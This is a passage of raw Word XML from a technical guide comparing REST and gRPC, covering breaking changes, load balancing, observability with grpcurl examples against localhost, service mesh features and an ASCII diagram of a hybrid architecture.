          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve"> Removing fields that clients depend on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F949F7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve"> Changing field numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67975ED2" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve"> Changing field types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351D932E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve"> Removing RPC methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA40CF9" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve"> Changing stream semantics (unary </w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve"> streaming)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12928E51" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:pict w14:anchorId="0ACFBEC3">
          <v:rect id="_x0000_i6539" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6A7572" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Infrastructure and Operational Concerns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E285CD8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.1 Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7EC0C8" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B68B3B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>REST (HTTP/1.1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0008105B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  L4 (TCP): Works fine. Each request = new connection (or keep-alive rotation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50683632" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  L7 (HTTP): Also works. Route by path, header, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F3EC6A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C1743A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>gRPC (HTTP/2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2894A71E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  L4 (TCP): DOESN'T work well!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DBFFC4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    gRPC opens ONE long-lived connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EFE230" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    L4 LB routes the connection to one backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C51911" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    ALL requests go to that one backend (no distribution!).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5F5B8C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4147D071" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  L7 (HTTP/2-aware): REQUIRED for gRPC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B145CEF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    L7 LB inspects HTTP/2 frames.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573E2D84" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Routes each stream (request) independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076501FD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Proper distribution across backends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490A0301" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20220AC4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Tools: Envoy, Istio, Linkerd, AWS ALB (with gRPC support).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5503CD08" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDD7EDB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Alternative: Client-side load balancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05584DF6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Client resolves service → gets list of backends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B384E6" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Client sends requests to different backends directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFE3DAD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    Used by: gRPC built-in LB, service mesh sidecars.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3090F2AF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.2 Observability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BAFF70" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E639AF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>REST:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563FF226" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Access logs (standard HTTP logs — method, path, status, duration).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E397425" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Distributed tracing (inject trace headers in HTTP requests).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D298F34" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Metrics: request rate, error rate, latency (standard HTTP metrics).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6776C3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Debugging: easy (curl, browser dev tools, log the JSON).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5243EB82" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="12AEBDCF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>gRPC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B47109" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Interceptors for logging, tracing, metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29614102" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Distributed tracing (inject via gRPC metadata — same concept as HTTP headers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1307C24B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Metrics: same signals (rate, errors, duration) but per-method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB5858C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Debugging: harder (binary protocol, need grpcurl or specialized tools).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD11E94" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    grpcurl -plaintext localhost:50051 describe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8F01FD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    grpcurl -d '{"order_id": "789"}' localhost:50051 ecommerce.OrderService/GetOrder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4C01E1" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.3 Service Mesh Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF0ECB5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB598AC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Service mesh (Istio/Envoy) handles both REST and gRPC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AECBCF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - mTLS (mutual TLS — automatic encryption and identity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CDAF6B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Load balancing (L7 for both).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CF994D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Retries (automatic retry with configurable policy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F38FB5C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Circuit breaking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380FD0D7" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Rate limiting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CB8878" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Observability (metrics, traces, access logs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083F3E8F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Traffic management (canary, blue-green, fault injection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4FBB0E" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A"/>
    <w:p w14:paraId="76C7F062" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>gRPC benefits MORE from service mesh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5DD9CF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - L7 load balancing is essential for gRPC (vs. optional for REST).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E79BDED" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Connection management (long-lived connections need careful handling).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F782450" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  - Health checking integration (gRPC health check protocol).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F15C43D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:pict w14:anchorId="5ED5EC9F">
          <v:rect id="_x0000_i6540" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61163452" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. Real-World Architecture Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE217AA" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>11.1 The Common Hybrid Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB2A17D" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE9EBE3" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>┌────────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0B3523" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│                                                                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C02591B" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  External Clients                   Internal Services            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11212F09" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  (browsers, mobile, third-party)    (microservices)             │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41163806" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│                                                                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C700A29" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  ┌──────────┐                       ┌──────────┐               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4142816A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  │ Browser  │──REST/JSON──┐    ┌───│Service A │               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6B9407" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  └──────────┘             │    │    └──────────┘               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1AA62F" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">│                           </w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">                      </w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12664A85" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  ┌──────────┐      ┌──────────┐│         │gRPC                 │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794583F0" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">│  │ Mobile   │─REST─│   API    ││         </w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">                      </w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE39428" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  │ App      │      │ Gateway  ││   ┌──────────┐               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B7BA0C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  └──────────┘      └──────────┘│   │Service B │               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E69070C" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│                           │     │   └──────────┘               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E40230A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  ┌──────────┐             │     │         │                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8CFBA4" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  │ Partner  │──REST───────┘     │         │gRPC                 │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349EA795" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">│  │ API      │                   │         </w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">                      </w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458FD346" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│  └──────────┘                   │   ┌──────────┐               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A8FD98" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>│                                 └──→│Service C │               │</w:t>
      </w:r>
    </w:p>
